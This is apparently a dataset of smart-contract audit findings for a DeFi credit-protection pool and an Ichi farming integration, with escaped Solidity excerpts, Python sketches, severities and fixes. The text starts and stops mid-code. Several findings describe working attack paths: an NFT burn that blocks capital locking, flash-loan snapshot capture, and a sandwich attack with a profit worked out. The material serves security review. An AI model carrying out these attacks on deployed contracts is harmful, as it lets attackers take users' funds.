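    if current == LATE and new == EXPIRED:
        if last_payment_made:
            actions.append("unlock_capital")    # loan repaid: sellers recover
        else:
            actions.append("treat_as_default")  # no payment: buyers can claim
    return new

actions = []
state = transition(LATE, EXPIRED, last_payment_made=True, actions=actions)
```

The key point is that the expiry check alone cannot distinguish "term ended after full repayment" from "term ended with a missed payment", so the transition handler must consult the payment status.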
Depending on the situation, capital can be locked forever or protection buyers will not be compensated.
```\\n function _getLendingPoolStatus(address _lendingPoolAddress)\\n internal\\n view\\n returns (LendingPoolStatus)\\n {\\n if (!_isReferenceLendingPoolAdded(_lendingPoolAddress)) {\\n return LendingPoolStatus.NotSupported;\\n }\\n\\n\\n ILendingProtocolAdapter _adapter = _getLendingProtocolAdapter(\\n _lendingPoolAddress\\n );\\n\\n\\n if (_adapter.isLendingPoolExpired(_lendingPoolAddress)) {\\n return LendingPoolStatus.Expired;\\n }\\n\\n\\n if (\\n _adapter.isLendingPoolLateWithinGracePeriod(\\n _lendingPoolAddress,\\n Constants.LATE_PAYMENT_GRACE_PERIOD_IN_DAYS\\n )\\n ) {\\n return LendingPoolStatus.LateWithinGracePeriod;\\n }\\n\\n\\n if (_adapter.isLendingPoolLate(_lendingPoolAddress)) {\\n return LendingPoolStatus.Late;\\n }\\n\\n\\n return LendingPoolStatus.Active;\\n }\\n```\\n
Existing buyer who has been regularly renewing protection will be denied renewal even when she is well within the renewal grace period
high
Existing buyers have an opportunity to renew their protection within a grace period. If the lending state update from `Active` to `LateWithinGracePeriod` happens just 1 second after a buyer's protection expires, the protocol denies the buyer that opportunity even when she is well within the grace period.\\nSince defaults are not sudden and an `Active` loan first transitions into `LateWithinGracePeriod`, it is unfair to deny an existing buyer an opportunity to renew (it's alright if a new protection buyer is DOSed). This is especially so because a late loan can become `active` again in the future (or move to `default`; both possibilities exist at this stage).\\nAll previous protection payments are a total loss for a buyer who is denied a legitimate renewal request at the first sign of danger.\\n`renewProtection` first calls `verifyBuyerCanRenewProtection`, which checks that the user requesting renewal holds the same NFT id on the same lending pool address and that the current request is within the grace period defined by the protocol.\\nOnce successfully verified, `renewProtection` calls `_verifyAndCreateProtection` to renew the protection. This is the same function that gets called when a new protection is created.\\nNotice that this function calls `_verifyLendingPoolIsActive` as part of its verification before creating a new protection - this check denies protection on loans that are in the `LateWithinGracePeriod` or `Late` phase (see snippet below).\\n```\\nfunction _verifyLendingPoolIsActive(\\n IDefaultStateManager defaultStateManager,\\n address _protectionPoolAddress,\\n address _lendingPoolAddress\\n ) internal view {\\n LendingPoolStatus poolStatus = defaultStateManager.getLendingPoolStatus(\\n _protectionPoolAddress,\\n _lendingPoolAddress\\n );\\n\\n // rest of code\\n if (\\n poolStatus == LendingPoolStatus.LateWithinGracePeriod ||\\n poolStatus == LendingPoolStatus.Late\\n ) {\\n revert IProtectionPool.LendingPoolHasLatePayment(_lendingPoolAddress);\\n }\\n // rest of code\\n}\\n```\\n
When a user is calling `renewProtection`, a different implementation of `verifyLendingPoolIsActive` is needed that allows a user to renew even when lending pool status is `LateWithinGracePeriod` or `Late`.\\nRecommend using `verifyLendingPoolIsActiveForRenewal` function in renewal flow as shown below\\n```\\n function verifyLendingPoolIsActiveForRenewal(\\n IDefaultStateManager defaultStateManager,\\n address _protectionPoolAddress,\\n address _lendingPoolAddress\\n ) internal view {\\n LendingPoolStatus poolStatus = defaultStateManager.getLendingPoolStatus(\\n _protectionPoolAddress,\\n _lendingPoolAddress\\n );\\n\\n if (poolStatus == LendingPoolStatus.NotSupported) {\\n revert IProtectionPool.LendingPoolNotSupported(_lendingPoolAddress);\\n }\\n //------ audit - this section needs to be commented-----//\\n //if (\\n // poolStatus == LendingPoolStatus.LateWithinGracePeriod ||\\n // poolStatus == LendingPoolStatus.Late\\n //) {\\n // revert IProtectionPool.LendingPoolHasLatePayment(_lendingPoolAddress);\\n //}\\n // ---------------------------------------------------------//\\n\\n if (poolStatus == LendingPoolStatus.Expired) {\\n revert IProtectionPool.LendingPoolExpired(_lendingPoolAddress);\\n }\\n\\n if (poolStatus == LendingPoolStatus.Defaulted) {\\n revert IProtectionPool.LendingPoolDefaulted(_lendingPoolAddress);\\n }\\n }\\n```\\n
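The gating difference between new purchases and renewals can be sketched compactly (hypothetical helper, simplified status model):

```python
# Late states should block new purchases but not renewals within the
# grace period; terminal states block both.

LATE_STATES = {"LateWithinGracePeriod", "Late"}
TERMINAL_STATES = {"NotSupported", "Expired", "Defaulted"}

def can_buy_protection(status, is_renewal):
    if status in TERMINAL_STATES:
        return False
    if status in LATE_STATES:
        return is_renewal  # only existing buyers may proceed here
    return True
```

This keeps a single decision point while letting the renewal flow pass a flag instead of duplicating the whole verification function.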
A user who has been regularly renewing protection and paying premiums to protect against a future loss event will be denied that very protection when she most needs it.\\nIf an existing user is denied renewal, she can never get back in (unless the lending pool becomes active again). All her previous payments were a total loss for her.
```\\nfunction _verifyLendingPoolIsActive(\\n IDefaultStateManager defaultStateManager,\\n address _protectionPoolAddress,\\n address _lendingPoolAddress\\n ) internal view {\\n LendingPoolStatus poolStatus = defaultStateManager.getLendingPoolStatus(\\n _protectionPoolAddress,\\n _lendingPoolAddress\\n );\\n\\n // rest of code\\n if (\\n poolStatus == LendingPoolStatus.LateWithinGracePeriod ||\\n poolStatus == LendingPoolStatus.Late\\n ) {\\n revert IProtectionPool.LendingPoolHasLatePayment(_lendingPoolAddress);\\n }\\n // rest of code\\n}\\n```\\n
Malicious seller can force lockCapital() to break
high
A malicious NFT burn causes `lockCapital()` to fail; sellers steadily earn the premium amount while buyers lose their compensation.\\nWhen the status of the lendingPool changes from Active to Late, the protocol calls ProtectionPool.lockCapital() to lock the required amount. lockCapital() loops through the active protections to calculate the `lockedAmount`. The code is as follows:\\n```\\n function lockCapital(address _lendingPoolAddress)\\n external\\n payable\\n override\\n onlyDefaultStateManager\\n whenNotPaused\\n returns (uint256 _lockedAmount, uint256 _snapshotId)\\n {\\n// rest of code.\\n uint256 _length = activeProtectionIndexes.length();\\n for (uint256 i; i < _length; ) {\\n// rest of code\\n uint256 _remainingPrincipal = poolInfo\\n .referenceLendingPools\\n .calculateRemainingPrincipal( //<----------- calculate Remaining Principal\\n _lendingPoolAddress,\\n protectionInfo.buyer,\\n protectionInfo.purchaseParams.nftLpTokenId\\n );\\n```\\n\\nThe key step is computing _remainingPrincipal via `referenceLendingPools.calculateRemainingPrincipal()`:\\n```\\n function calculateRemainingPrincipal(\\n address _lendingPoolAddress,\\n address _lender,\\n uint256 _nftLpTokenId\\n ) public view override returns (uint256 _principalRemaining) {\\n// rest of code\\n\\n if (_poolTokens.ownerOf(_nftLpTokenId) == _lender) { //<------------call ownerOf()\\n IPoolTokens.TokenInfo memory _tokenInfo = _poolTokens.getTokenInfo(\\n _nftLpTokenId\\n );\\n\\n// rest of code.\\n if (\\n _tokenInfo.pool == _lendingPoolAddress &&\\n _isJuniorTrancheId(_tokenInfo.tranche)\\n ) {\\n _principalRemaining =\\n _tokenInfo.principalAmount -\\n _tokenInfo.principalRedeemed;\\n }\\n }\\n }\\n```\\n\\nThe current implementation of GoldfinchAdapter.calculateRemainingPrincipal() first checks whether the ownerOf the NFTID is _lender.\\nThere is a potential problem here: if the NFTID has been burned, ownerOf() will revert, which makes calculateRemainingPrincipal() revert, which in turn makes lockCapital() revert, so the status can't change from Active to Late.\\nLet's check whether Goldfinch's implementation supports burn(NFTID), and whether ownerOf(NFTID) will revert.\\n1. PoolTokens has a burn() method; if principalRedeemed == principalAmount you can burn the token:\\n```\\ncontract PoolTokens is IPoolTokens, ERC721PresetMinterPauserAutoIdUpgradeSafe, HasAdmin, IERC2981 {\\n// rest of code..\\n function burn(uint256 tokenId) external virtual override whenNotPaused {\\n TokenInfo memory token = _getTokenInfo(tokenId);\\n bool canBurn = _isApprovedOrOwner(_msgSender(), tokenId);\\n bool fromTokenPool = _validPool(_msgSender()) && token.pool == _msgSender();\\n address owner = ownerOf(tokenId);\\n require(canBurn || fromTokenPool, "ERC721Burnable: caller cannot burn this token");\\n require(token.principalRedeemed == token.principalAmount, "Can only burn fully redeemed tokens");\\n _destroyAndBurn(tokenId);\\n emit TokenBurned(owner, token.pool, tokenId);\\n }\\n```\\n\\n2. ownerOf() reverts with the message "ERC721: owner query for nonexistent token" if the NFTID doesn't exist:\\n```\\ncontract ERC721UpgradeSafe is\\n Initializable,\\n ContextUpgradeSafe,\\n ERC165UpgradeSafe,\\n IERC721,\\n IERC721Metadata,\\n IERC721Enumerable\\n{\\n// rest of code\\n function ownerOf(uint256 tokenId) public view override returns (address) {\\n return _tokenOwners.get(tokenId, "ERC721: owner query for nonexistent token");\\n }\\n```\\n\\nIf the status can't change to Late, the funds won't be locked and sellers steadily earn the premium amount.\\nSo there are two risks:\\n1. A normal buyer burns their NFTID without knowing that it will affect all protections of the lendingPool.\\n2. A malicious seller can buy a protection first and then burn its NFT, forcing all protections of the lendingPool to expire and pocketing the premium amount maliciously; buyers are unable to obtain compensation.\\nSuggested fix: wrap _poolTokens.ownerOf() in a try/catch; if it reverts, assume the lender is not the owner.
Wrap the `_poolTokens.ownerOf()` call in a try/catch; if it reverts, assume the lender is not the owner.
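In Python terms, the suggested try/catch behaves like this (illustrative sketch; `NonexistentToken` stands in for the ERC721 revert on a burned token):

```python
# An ownerOf() revert for a burned/nonexistent NFT is treated as
# "lender holds no remaining principal" instead of aborting the whole
# lockCapital() loop.

class NonexistentToken(Exception):
    pass

def remaining_principal(owner_of, token_id, lender, principal, redeemed):
    try:
        owner = owner_of(token_id)
    except NonexistentToken:
        return 0  # burned token: nothing left to protect for this position
    if owner != lender:
        return 0
    return principal - redeemed

def burned_lookup(_token_id):
    raise NonexistentToken()

safe_result = remaining_principal(burned_lookup, 1, "lender", 100, 100)
```

Treating the revert as a zero remaining principal is consistent with Goldfinch's burn precondition, since only fully redeemed tokens can be burned.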
Buyers will lose their compensation.
```\\n function lockCapital(address _lendingPoolAddress)\\n external\\n payable\\n override\\n onlyDefaultStateManager\\n whenNotPaused\\n returns (uint256 _lockedAmount, uint256 _snapshotId)\\n {\\n// rest of code.\\n uint256 _length = activeProtectionIndexes.length();\\n for (uint256 i; i < _length; ) {\\n// rest of code\\n uint256 _remainingPrincipal = poolInfo\\n .referenceLendingPools\\n .calculateRemainingPrincipal( //<----------- calculate Remaining Principal\\n _lendingPoolAddress,\\n protectionInfo.buyer,\\n protectionInfo.purchaseParams.nftLpTokenId\\n );\\n```\\n
lockCapital() doesn't filter out expired protections first, so it may lock more funds than required and pay out on expired defaulted protections
medium
When a lending loan defaults, the function `lockCapital()` gets called on the ProtectionPool to lock the funds required for the protections bought on that lending pool. But the code doesn't filter out expired protections first: there may be expired protections in the active protection array that are not excluded, which causes the code to lock more funds and pay out for expired defaulted protections, so protection sellers lose more funds.\\nThis is the `lockCapital()` code:\\n```\\n function lockCapital(address _lendingPoolAddress)\\n external\\n payable\\n override\\n onlyDefaultStateManager\\n whenNotPaused\\n returns (uint256 _lockedAmount, uint256 _snapshotId)\\n {\\n /// step 1: Capture protection pool's current investors by creating a snapshot of the token balance by using ERC20Snapshot in SToken\\n _snapshotId = _snapshot();\\n\\n /// step 2: calculate total capital to be locked\\n LendingPoolDetail storage lendingPoolDetail = lendingPoolDetails[\\n _lendingPoolAddress\\n ];\\n\\n /// Get indexes of active protection for a lending pool from the storage\\n EnumerableSetUpgradeable.UintSet\\n storage activeProtectionIndexes = lendingPoolDetail\\n .activeProtectionIndexes;\\n\\n /// Iterate all active protections and calculate total locked amount for this lending pool\\n /// 1. calculate remaining principal amount for each loan protection in the lending pool.\\n /// 2. for each loan protection, lockedAmt = min(protectionAmt, remainingPrincipal)\\n /// 3. total locked amount = sum of lockedAmt for all loan protections\\n uint256 _length = activeProtectionIndexes.length();\\n for (uint256 i; i < _length; ) {\\n /// Get protection info from the storage\\n uint256 _protectionIndex = activeProtectionIndexes.at(i);\\n ProtectionInfo storage protectionInfo = protectionInfos[_protectionIndex];\\n\\n /// Calculate remaining principal amount for a loan protection in the lending pool\\n uint256 _remainingPrincipal = poolInfo\\n .referenceLendingPools\\n .calculateRemainingPrincipal(\\n _lendingPoolAddress,\\n protectionInfo.buyer,\\n protectionInfo.purchaseParams.nftLpTokenId\\n );\\n\\n /// Locked amount is minimum of protection amount and remaining principal\\n uint256 _protectionAmount = protectionInfo\\n .purchaseParams\\n .protectionAmount;\\n uint256 _lockedAmountPerProtection = _protectionAmount <\\n _remainingPrincipal\\n ? _protectionAmount\\n : _remainingPrincipal;\\n\\n _lockedAmount += _lockedAmountPerProtection;\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n unchecked {\\n /// step 3: Update total locked & available capital in storage\\n if (totalSTokenUnderlying < _lockedAmount) {\\n /// If totalSTokenUnderlying < _lockedAmount, then lock all available capital\\n _lockedAmount = totalSTokenUnderlying;\\n totalSTokenUnderlying = 0;\\n } else {\\n /// Reduce the total sToken underlying amount by the locked amount\\n totalSTokenUnderlying -= _lockedAmount;\\n }\\n }\\n }\\n```\\n\\nAs you can see, the code loops through the active protection array for that lending pool and calculates the required locked amount, but it doesn't call `_accruePremiumAndExpireProtections()` first to make sure the active protections don't include any expired ones. If `_accruePremiumAndExpireProtections()` hasn't been called for a while, it is possible that some protections have expired but are still in the active protection array. This causes the code to calculate a larger locked amount and also to pay out, from protection sellers' funds, for those expired defaulted protections. (The expiration check is also missing when calculating the required token payment in the other functions called by `lockCapital()`.)
Call `_accruePremiumAndExpireProtections()` for the defaulted pool first, so expired protections are filtered out before the locked amount is calculated.
See summary: the code may lock more funds than required and pay out on expired defaulted protections at protection sellers' expense.
```\\n function lockCapital(address _lendingPoolAddress)\\n external\\n payable\\n override\\n onlyDefaultStateManager\\n whenNotPaused\\n returns (uint256 _lockedAmount, uint256 _snapshotId)\\n {\\n /// step 1: Capture protection pool's current investors by creating a snapshot of the token balance by using ERC20Snapshot in SToken\\n _snapshotId = _snapshot();\\n\\n /// step 2: calculate total capital to be locked\\n LendingPoolDetail storage lendingPoolDetail = lendingPoolDetails[\\n _lendingPoolAddress\\n ];\\n\\n /// Get indexes of active protection for a lending pool from the storage\\n EnumerableSetUpgradeable.UintSet\\n storage activeProtectionIndexes = lendingPoolDetail\\n .activeProtectionIndexes;\\n\\n /// Iterate all active protections and calculate total locked amount for this lending pool\\n /// 1. calculate remaining principal amount for each loan protection in the lending pool.\\n /// 2. for each loan protection, lockedAmt = min(protectionAmt, remainingPrincipal)\\n /// 3. total locked amount = sum of lockedAmt for all loan protections\\n uint256 _length = activeProtectionIndexes.length();\\n for (uint256 i; i < _length; ) {\\n /// Get protection info from the storage\\n uint256 _protectionIndex = activeProtectionIndexes.at(i);\\n ProtectionInfo storage protectionInfo = protectionInfos[_protectionIndex];\\n\\n /// Calculate remaining principal amount for a loan protection in the lending pool\\n uint256 _remainingPrincipal = poolInfo\\n .referenceLendingPools\\n .calculateRemainingPrincipal(\\n _lendingPoolAddress,\\n protectionInfo.buyer,\\n protectionInfo.purchaseParams.nftLpTokenId\\n );\\n\\n /// Locked amount is minimum of protection amount and remaining principal\\n uint256 _protectionAmount = protectionInfo\\n .purchaseParams\\n .protectionAmount;\\n uint256 _lockedAmountPerProtection = _protectionAmount <\\n _remainingPrincipal\\n ? 
_protectionAmount\\n : _remainingPrincipal;\\n\\n _lockedAmount += _lockedAmountPerProtection;\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n unchecked {\\n /// step 3: Update total locked & available capital in storage\\n if (totalSTokenUnderlying < _lockedAmount) {\\n /// If totalSTokenUnderlying < _lockedAmount, then lock all available capital\\n _lockedAmount = totalSTokenUnderlying;\\n totalSTokenUnderlying = 0;\\n } else {\\n /// Reduce the total sToken underlying amount by the locked amount\\n totalSTokenUnderlying -= _lockedAmount;\\n }\\n }\\n }\\n```\\n
If unlocked capital in pool falls below minRequiredCapital, then protection can be bought for minimum premium
medium
If the unlocked capital in a pool falls below the minRequiredCapital, then protection can be bought for the minimum premium.\\nIn PremiumCalculator.calculatePremium, we see that if the risk factor "cannot be calculated," it uses the minimum premium.\\n```\\n if (\\n RiskFactorCalculator.canCalculateRiskFactor(\\n _totalCapital,\\n _leverageRatio,\\n _poolParameters.leverageRatioFloor,\\n _poolParameters.leverageRatioCeiling,\\n _poolParameters.minRequiredCapital\\n )\\n ) {\\n // rest of code\\n } else {\\n /// This means that the risk factor cannot be calculated because of either\\n /// min capital not met or leverage ratio out of range.\\n /// Hence, the premium is the minimum premium\\n _isMinPremium = true;\\n }\\n```\\n\\nIn RiskFactor.canCalculateRiskFactor, we see there are three conditions when this is so:\\n```\\n function canCalculateRiskFactor(\\n uint256 _totalCapital,\\n uint256 _leverageRatio,\\n uint256 _leverageRatioFloor,\\n uint256 _leverageRatioCeiling,\\n uint256 _minRequiredCapital\\n ) external pure returns (bool _canCalculate) {\\n if (\\n _totalCapital < _minRequiredCapital ||\\n _leverageRatio < _leverageRatioFloor ||\\n _leverageRatio > _leverageRatioCeiling\\n ) {\\n _canCalculate = false;\\n } else {\\n _canCalculate = true;\\n }\\n }\\n}\\n```\\n\\nIf the leverage ratio is above the ceiling, then protection should be very cheap, and it is correct to use the minimum premium. If the leverage ratio is below the floor, then protection cannot be purchased.\\nHowever, we see that the minimum premium is also used if _totalCapital is below _minRequiredCapital. In this case, protection should be very expensive, but it will instead be very cheap.
Prohibit protection purchases when unlocked capital falls below the minimum required capital.
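A sketch of this recommendation (illustrative names and values): below-minimum capital rejects the purchase outright instead of falling through to the minimum premium.

```python
# Only an above-ceiling leverage ratio (ample capital) should map to the
# minimum premium; insufficient capital and below-floor leverage both
# block the purchase.

def premium_mode(total_capital, min_required, leverage, floor, ceiling):
    if total_capital < min_required:
        raise ValueError("purchases disabled: capital below minimum")
    if leverage > ceiling:
        return "min_premium"      # ample capital: cheap protection is fine
    if leverage < floor:
        raise ValueError("leverage ratio below floor")
    return "risk_based_premium"

mode = premium_mode(2_000_000, 1_000_000, leverage=5, floor=1, ceiling=4)
try:
    premium_mode(500_000, 1_000_000, leverage=5, floor=1, ceiling=4)
    undercapitalized_allowed = True
except ValueError:
    undercapitalized_allowed = False
```

This separates the three "cannot calculate" conditions by their correct economic meaning instead of collapsing them all into the minimum premium.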
Buyers can get very cheap protection at a time when it should be expensive.
```\\n if (\\n RiskFactorCalculator.canCalculateRiskFactor(\\n _totalCapital,\\n _leverageRatio,\\n _poolParameters.leverageRatioFloor,\\n _poolParameters.leverageRatioCeiling,\\n _poolParameters.minRequiredCapital\\n )\\n ) {\\n // rest of code\\n } else {\\n /// This means that the risk factor cannot be calculated because of either\\n /// min capital not met or leverage ratio out of range.\\n /// Hence, the premium is the minimum premium\\n _isMinPremium = true;\\n }\\n```\\n
secondary markets are problematic with how `lockCapital` works
medium
Seeing that a pool is about to lock, an attacker can use a flash loan from a secondary market like uniswap to claim the share of a potential unlock of capital later.\\nThe timestamp a pool switches to `Late` can be predicted and an attacker can use this to call `assessState` which is callable by anyone. This will trigger the pool to move from Active/LateWithinGracePeriod to `Late` calling `lockCapital` on the ProtectionPool:\\n```\\nFile: ProtectionPool.sol\\n\\n /// step 1: Capture protection pool's current investors by creating a snapshot of the token balance by using ERC20Snapshot in SToken\\n _snapshotId = _snapshot();\\n```\\n\\nThis records who is holding sTokens at this point in time. If the borrower makes a payment and the pool turns back to Active, later the locked funds will be available to claim for the sToken holders at that snapshot:\\n```\\nFile: DefaultStateManager.sol\\n\\n /// The claimable amount for the given seller is proportional to the seller's share of the total supply at the snapshot\\n /// claimable amount = (seller's snapshot balance / total supply at snapshot) * locked capital amount\\n _claimableUnlockedCapital =\\n (_poolSToken.balanceOfAt(_seller, _snapshotId) *\\n lockedCapital.amount) /\\n _poolSToken.totalSupplyAt(_snapshotId);\\n```\\n\\nFrom docs:\\nIf sellers wish to redeem their capital and interest before the lockup period, they might be able to find a buyer of their sToken in a secondary market like Uniswap. Traders in the exchanges can long/short sTokens based on their opinion about the risk exposure associated with sTokens. Since an sToken is a fungible ERC20 token, it is fairly easy to bootstrap the secondary markets for protection sellers.\\nIf there is a uniswap (or similar) pool for this sToken, an attacker could potentially, using a flash loan, trigger the switch to `Late` and since they will be the ones holding the sTokens at the point of locking they will be the ones that can claim the funds at a potential unlock.
I recommend making `assessState` callable only by a trusted user. This removes the attack vector, since an attacker would then have to hold the tokens across transactions rather than within a single flash-loan transaction. It would still be possible to use the withdraw bug, but if that is fixed, this would remove the possibility to "flash-lock".
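The access-control idea can be sketched as follows (hypothetical wrapper; names are illustrative):

```python
# Only a trusted keeper may trigger state assessment, so a flash-loan
# holder cannot force the snapshot inside its own transaction.

def make_assess_state(trusted_keepers, do_assess):
    def assess_state(caller):
        if caller not in trusted_keepers:
            raise PermissionError("caller is not a trusted keeper")
        return do_assess()
    return assess_state

assess = make_assess_state({"keeper"}, lambda: "snapshot_taken")
result = assess("keeper")
try:
    assess("attacker")
    attacker_allowed = True
except PermissionError:
    attacker_allowed = False
```

The trade-off is liveness: state assessment now depends on the keeper set, so the protocol should run its own keeper rather than rely on permissionless callers.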
An attacker can, using a flash loan from a secondary market like Uniswap, steal an LP's potential share of unlocked tokens, risking only the flash loan fee.
```\\nFile: ProtectionPool.sol\\n\\n /// step 1: Capture protection pool's current investors by creating a snapshot of the token balance by using ERC20Snapshot in SToken\\n _snapshotId = _snapshot();\\n```\\n
Sandwich attack on accruePremiumAndExpireProtections()
high
Let's show how a malicious user, Bob, can launch a sandwich attack on `accruePremiumAndExpireProtections()` and profit.\\nSuppose there are 1,000,000 underlying tokens in the `ProtectionPool`, and `totalSupply = 1,000,000`, so the exchange rate is 1 underlying token per share. Suppose Bob has 100,000 shares.\\nSuppose `accruePremiumAndExpireProtections()` is about to be called and will add 100,000 to `totalSTokenUnderlying` at L346.\\nBob front-runs `accruePremiumAndExpireProtections()` and calls `deposit()` to deposit 100,000 underlying tokens into the contract. The check for `ProtectionPoolPhase` will pass in an open phase. As a result, there are 1,100,000 underlying tokens and 1,100,000 shares; the exchange rate is still 1 underlying token per share. Bob now has 200,000 shares.\\n```\\n function deposit(uint256 _underlyingAmount, address _receiver)\\n external\\n override\\n whenNotPaused\\n nonReentrant\\n {\\n _deposit(_underlyingAmount, _receiver);\\n }\\n\\n function _deposit(uint256 _underlyingAmount, address _receiver) internal {\\n /// Verify that the pool is not in OpenToBuyers phase\\n if (poolInfo.currentPhase == ProtectionPoolPhase.OpenToBuyers) {\\n revert ProtectionPoolInOpenToBuyersPhase();\\n }\\n\\n uint256 _sTokenShares = convertToSToken(_underlyingAmount);\\n totalSTokenUnderlying += _underlyingAmount;\\n _safeMint(_receiver, _sTokenShares);\\n poolInfo.underlyingToken.safeTransferFrom(\\n msg.sender,\\n address(this),\\n _underlyingAmount\\n );\\n\\n /// Verify leverage ratio only when total capital/sTokenUnderlying is higher than minimum capital requirement\\n if (_hasMinRequiredCapital()) {\\n /// calculate pool's current leverage ratio considering the new deposit\\n uint256 _leverageRatio = calculateLeverageRatio();\\n\\n if (_leverageRatio > poolInfo.params.leverageRatioCeiling) {\\n revert ProtectionPoolLeverageRatioTooHigh(_leverageRatio);\\n }\\n }\\n\\n emit ProtectionSold(_receiver, _underlyingAmount);\\n }\\n```\\n\\nNow `accruePremiumAndExpireProtections()` gets called and 100,000 is added to `totalSTokenUnderlying` at L346. As a result, we have 1,200,000 underlying tokens with 1,100,000 shares. The exchange rate becomes 12/11 tokens per share.\\nBob calls the `withdraw()` function (assume he made a request two cycles back; he could do that since he had 100,000 underlying tokens in the pool) to withdraw 100,000 shares, and he will get `100,000 * 12/11 = 109,090` underlying tokens. So he has a profit of 9,090 underlying tokens from the sandwich attack.
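The arithmetic above can be reproduced with integer division, as Solidity would compute it:

```python
# Bob front-runs the premium accrual with a deposit and back-runs it with
# a withdrawal, capturing part of the premium added in between.

def shares_for_deposit(amount, total_tokens, total_shares):
    return amount * total_shares // total_tokens

def tokens_for_shares(shares, total_tokens, total_shares):
    return shares * total_tokens // total_shares

tokens, shares = 1_000_000, 1_000_000
minted = shares_for_deposit(100_000, tokens, shares)  # 1:1 rate -> 100,000
tokens += 100_000
shares += minted
tokens += 100_000  # accruePremiumAndExpireProtections adds the premium
payout = tokens_for_shares(minted, tokens, shares)
profit = payout - 100_000
```

Running this confirms the example: the payout is 109,090 tokens, a 9,090-token profit on a riskless round trip.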
Create a new contract as a temporary place to store the accrued premium, and then deliver it to the `ProtectionPool` over a period of time (delivery period) with some `premiumPerSecond`, to lower the incentive of a quick profit by sandwich attack.\\nRestrict the maximum deposit amount for each cycle.\\nRestrict the maximum withdrawal amount for each cycle.
A malicious user can launch a sandwich attack on `accruePremiumAndExpireProtections()` and profit.
```\\n function deposit(uint256 _underlyingAmount, address _receiver)\\n external\\n override\\n whenNotPaused\\n nonReentrant\\n {\\n _deposit(_underlyingAmount, _receiver);\\n }\\n\\n function _deposit(uint256 _underlyingAmount, address _receiver) internal {\\n /// Verify that the pool is not in OpenToBuyers phase\\n if (poolInfo.currentPhase == ProtectionPoolPhase.OpenToBuyers) {\\n revert ProtectionPoolInOpenToBuyersPhase();\\n }\\n\\n uint256 _sTokenShares = convertToSToken(_underlyingAmount);\\n totalSTokenUnderlying += _underlyingAmount;\\n _safeMint(_receiver, _sTokenShares);\\n poolInfo.underlyingToken.safeTransferFrom(\\n msg.sender,\\n address(this),\\n _underlyingAmount\\n );\\n\\n /// Verify leverage ratio only when total capital/sTokenUnderlying is higher than minimum capital requirement\\n if (_hasMinRequiredCapital()) {\\n /// calculate pool's current leverage ratio considering the new deposit\\n uint256 _leverageRatio = calculateLeverageRatio();\\n\\n if (_leverageRatio > poolInfo.params.leverageRatioCeiling) {\\n revert ProtectionPoolLeverageRatioTooHigh(_leverageRatio);\\n }\\n }\\n\\n emit ProtectionSold(_receiver, _underlyingAmount);\\n }\\n```\\n
Users who deposit extra funds into their Ichi farming positions will lose all their ICHI rewards
high
When a user deposits extra funds into their Ichi farming position using `openPositionFarm()`, the old farming position will be closed down and a new one will be opened. As part of this process, their ICHI rewards will be sent to the `IchiVaultSpell.sol` contract, but they will not be distributed. They will sit in the contract until the next user (or MEV bot) calls `closePositionFarm()`, at which point they will be stolen by that user.\\nWhen Ichi farming positions are opened via the `IchiVaultSpell.sol` contract, `openPositionFarm()` is called. It goes through the usual deposit function, but rather than staking the LP tokens directly, it calls `wIchiFarm.mint()`. This function deposits the token into the `ichiFarm`, encodes the deposit as an ERC1155, and sends that token back to the Spell:\\n```\\nfunction mint(uint256 pid, uint256 amount)\\n external\\n nonReentrant\\n returns (uint256)\\n{\\n address lpToken = ichiFarm.lpToken(pid);\\n IERC20Upgradeable(lpToken).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n if (\\n IERC20Upgradeable(lpToken).allowance(\\n address(this),\\n address(ichiFarm)\\n ) != type(uint256).max\\n ) {\\n // We only need to do this once per pool, as LP token's allowance won't decrease if it's -1.\\n IERC20Upgradeable(lpToken).safeApprove(\\n address(ichiFarm),\\n type(uint256).max\\n );\\n }\\n ichiFarm.deposit(pid, amount, address(this));\\n // note: the id encodes accIchiPerShare at staking time, so the reward\\n // difference can be computed at unstake\\n (uint256 ichiPerShare, , ) = ichiFarm.poolInfo(pid);\\n uint256 id = encodeId(pid, ichiPerShare);\\n _mint(msg.sender, id, amount, "");\\n return id;\\n}\\n```\\n\\nThe resulting ERC1155 is posted as collateral in the Blueberry Bank.\\nIf the user decides to add more funds to this position, they simply call `openPositionFarm()` again.
The function has logic to check if there is already existing collateral of this LP token in the Blueberry Bank. If there is, it removes the collateral and calls `wIchiFarm.burn()` (which harvests the Ichi rewards and withdraws the LP tokens) before repeating the deposit process.\\n```\\nfunction burn(uint256 id, uint256 amount)\\n external\\n nonReentrant\\n returns (uint256)\\n{\\n if (amount == type(uint256).max) {\\n amount = balanceOf(msg.sender, id);\\n }\\n (uint256 pid, uint256 stIchiPerShare) = decodeId(id);\\n _burn(msg.sender, id, amount);\\n\\n uint256 ichiRewards = ichiFarm.pendingIchi(pid, address(this));\\n ichiFarm.harvest(pid, address(this));\\n ichiFarm.withdraw(pid, amount, address(this));\\n\\n // Convert Legacy ICHI to ICHI v2\\n if (ichiRewards > 0) {\\n ICHIv1.safeApprove(address(ICHI), ichiRewards);\\n ICHI.convertToV2(ichiRewards);\\n }\\n\\n // Transfer LP Tokens\\n address lpToken = ichiFarm.lpToken(pid);\\n IERC20Upgradeable(lpToken).safeTransfer(msg.sender, amount);\\n\\n // Transfer Reward Tokens\\n (uint256 enIchiPerShare, , ) = ichiFarm.poolInfo(pid);\\n uint256 stIchi = (stIchiPerShare * amount).divCeil(1e18);\\n uint256 enIchi = (enIchiPerShare * amount) / 1e18;\\n\\n if (enIchi > stIchi) {\\n ICHI.safeTransfer(msg.sender, enIchi - stIchi);\\n }\\n return pid;\\n}\\n```\\n\\nHowever, this deposit process has no logic for distributing the ICHI rewards. Therefore, these rewards will remain sitting in the `IchiVaultSpell.sol` contract and will not reach the user.\\nFor an example of how this is handled properly, we can look at the opposite function, `closePositionFarm()`. In this case, the same `wIchiFarm.burn()` function is called. 
But in this case, it's followed up with an explicit call to withdraw the ICHI from the contract to the user.\\n```\\ndoRefund(ICHI);\\n```\\n\\nThis `doRefund()` function refunds the contract's full balance of ICHI to the `msg.sender`, so the result is that the next user to call `closePositionFarm()` will steal the ICHI tokens from the original user who added to their farming position.
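The reward accounting inside `burn()` can be mirrored in a minimal Python sketch to show what goes missing when `openPositionFarm()` omits the refund. This is a simplification, not the contract's code: the share values and amounts are hypothetical, and the two balances stand in for the Spell contract's and the user's ICHI balances.

```python
WAD = 10**18  # fixed-point scale used by accIchiPerShare

def pending_rewards(st_per_share: int, en_per_share: int, amount: int) -> int:
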